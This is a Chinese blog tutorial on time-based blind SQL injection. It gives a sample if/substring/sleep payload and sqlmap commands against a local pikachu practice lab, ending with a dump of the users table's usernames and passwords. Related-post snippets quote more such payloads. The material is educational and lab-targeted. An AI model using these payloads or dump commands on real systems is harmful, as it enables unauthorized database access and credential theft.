【网络安全】SQL注入--时间注入

已于 2023-04-07 19:23:05 修改
阅读量844 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: web安全 数据库 mysql
于 2023-04-06 19:23:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41158271/article/details/129994563
本文详细介绍了如何利用sqlmap工具进行时间注入攻击,包括检查注入点、获取数据库名、表名、字段名以及具体数据,主要涉及函数sleep()、substring()和if(),并提供了针对MySQL数据库的示例命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

时间注入

利用原理

主要利用的函数
sleep()
substring()
if()

例子:

1' and if(substring((select * from students limit1),1,1)='a',sleep(5),0)
#当条件满足时,进行睡眠

使用sqlmap进行注入

1.查询是否存在时间注入
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql

在这里插入图片描述

2.获取数据库名称
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql --current-user --current-db --batch

-p: 指定的检测方式
-u: 指定url
-v:显示调试模式
--dbms:指定数据库
--technique=T:使用时间注入方式
--current-user:获取当前用户
--current-db:获取当前使用的数据库
--batch: 使用默认模式 自动为y

在这里插入图片描述

3.获取表名
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch

-D:指定数据库名称
--tables: 获取所有的表

在这里插入图片描述

4.获取字段名
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --columns -D pikachu -T users --batch

-T:指定表名
--columns:获取所有的字段

在这里插入图片描述

5.获取账号密码
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T -D pikachu -T users -C 'username,password' --dump --batch --thread 10

--dump:
-C:指定字段
--threads:指定线程数

在这里插入图片描述

渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下
LANDUOSHUREN的博客
10-25 1502
SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。
网络安全-sql注入-sqlmap
09-02
其中,SQL注入攻击是一种常见的网络安全威胁,它是一种代码注入技术,通过在Web表单输入或页面请求的查询字符串中注入恶意的SQL代码,攻击者可以操纵后端数据库,从而获得未授权的数据库访问权限,对数据进行读取、...
sql注入时间注入
m0_63436163的博客
04-15 1090
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入-u 表示检测的 url。-p 指定的检测参数。
SQL注入—详解(4)【时间盲注】
最新发布
2402_84408069的博客
05-17 1457
时间盲注(Time-Based Blind SQL Injection)是一种高级SQL注入技术,适用于应用程序不返回可见错误或数据,但会根据SQL语句的执行结果产生时间延迟的情形。攻击者通过构造特定的时间延迟条件(如sleep()、benchmark()),利用响应时间的差异推断数据库信息。攻击原理包括时间延迟触发和逐字符推断数据,通过二分法或逐位比较结合时间延迟判断数据的每个字符。攻击步骤包括确认漏洞存在、推断数据库名、获取表名和提取字段数据。
SQL注入之路之四:时间注入
weixin_62715196的博客
08-11 994
时间注入又名延时注入,属于盲注的一种,通常是某个注入点无法通过布尔型注入获取数据而采取的一种突破注入的技巧。在MySQL里函数sleep()是延时的意思,sleep(10)就是数据库延时10秒返回内容。判断注入可以使用’and sleep(10)意思是数据库延时10秒返回内容值(页面响应时间至少为10秒)MySQL延时注入用到的函数sleep()、if()、substring() select if(2>1,sleep(10),0)
SQL注入时间注入
2301_79299101的博客
09-25 882
mysql 延时注入用到的函数 sleep() 、if()、substring() select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的 SQL 语句。
sql注入-网络安全中的SQL注入技术及其防护措施
12-12
适合人群:网络开发人员、IT安全专家、软件测试工程师、网络安全研究者以及对Web安全有兴趣的学习者。 使用场景及目标:帮助企业开发团队理解和避免因SQL语句构建不当引发的安全威胁,保障线上业务系统的稳定性和...
网络安全-sql注入实战-sql-labs(1~10)
09-02
在深入探讨《网络安全-sql注入实战-sql-labs(1~10)》这一主题之前,我们首先要理解网络安全领域内SQL注入的严重性和它的工作机制。SQL注入是一种攻击技术,攻击者通过向Web应用的输入点插入恶意SQL代码,以此影响...
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
SQL注入是一种常见的网络安全威胁,它利用了不安全Web应用程序中的设计缺陷,使得攻击者能够通过构造特定的SQL语句来操纵或访问数据库。在实验六中,我们将深入理解并实践这种攻击方式,以提高对网络安全的认识。 ...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
sql漏洞注入——时间注入
m0_73756016的博客
11-01 2025
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
sql时间注入
ovowovo的博客
11-07 262
基于时间的盲注:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
SQL时间注入
weixin_30274627的博客
08-05 478
SQL时间注入   判断时间注入时,只要让sleep()函数执行成功,那么就可以根据回显时间判断是否为时间注入   在时间注入中,常常用到if()函数,if(语句一,语句2,语句3),如果语句一为真,执行语句2,否则执行语句3   几个常用的判断函数,substring(),length,user(),database(),下面是几个判断时间注入的常见语句     ' ...
sql学习4(时间注入
cyy001128的博客
04-05 896
id=1’ and if(ascii(substr((select database()),1,1))>100,1,sleep(5))–+ //如果数据库名字的第一个字符的acsii值小于100,则进行延时。id=1%20and%20if(substring(database(),1,1)=%27a%27,sleep(5),sleep(1))观察请求的时间,大概在5秒以上,说明构造的sleep(5) 语句起作用,可以把这个时间线作为sql 注入的判断依据。步骤同上,得到表名flag。
sql注入时间盲注
weixin_46954909的博客
04-02 1656
sql注入的整型字符型注入,联合注入,报错注入以及布尔盲注可参考,往期。
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4904
二、代码分析 三、sqlmap测时间注入
2024年网络安全最全超硬核,SQL注入时间盲注,原理+步骤+实战思路(4),2024年最新字节跳动网络安全面试凉凉经
2401_84239830的博客
05-07 936
数据库在执行SQL时,会先找缓存,如果缓存存在一样的SQL,则会直接返回缓存中的查询结果,而不会查找数据库。我们截取第一个字符,穷举这95种可能性即可,为了方便猜解,我们将字符转换为ASCLL码再进行判断(字符对应的ASCLL为 32~126)。同样的payload,如果第一次响应时间很长,但第二次响应时间很短,就说明是受到了网络波动的影响。条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。如果你能答对70%,找一个安全工作,问题不大。
sql注入-时间盲注
weixin_54217950的博客
02-15 1331
时间盲注 典型应用场景:Web页面只有一种返回结果。 注入方式:利用插入的SQL语句造成时间延迟,若延迟函数被成功执行(即页面反应时 间加长),则所查询的信息正确。 判断数据库长度 注意:若要查找数据库其他信息,将命令下的select database()整体替换。 and if((length(database()=8)),sleep(5),1)--+ 判断数据库名(字母逐个盲猜) 注意:若要查找数据库其他信息,将命令下的select database()整体替换。 and if((substr((s
超级SQL注入工具:网络安全领域的利器
资源摘要信息:"超级SQL注入工具是一款用于网络安全领域的软件工具,主要功能是发现并利用SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者通过向Web应用的输入框中插入恶意SQL代码,从而使数据库执行非预期的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值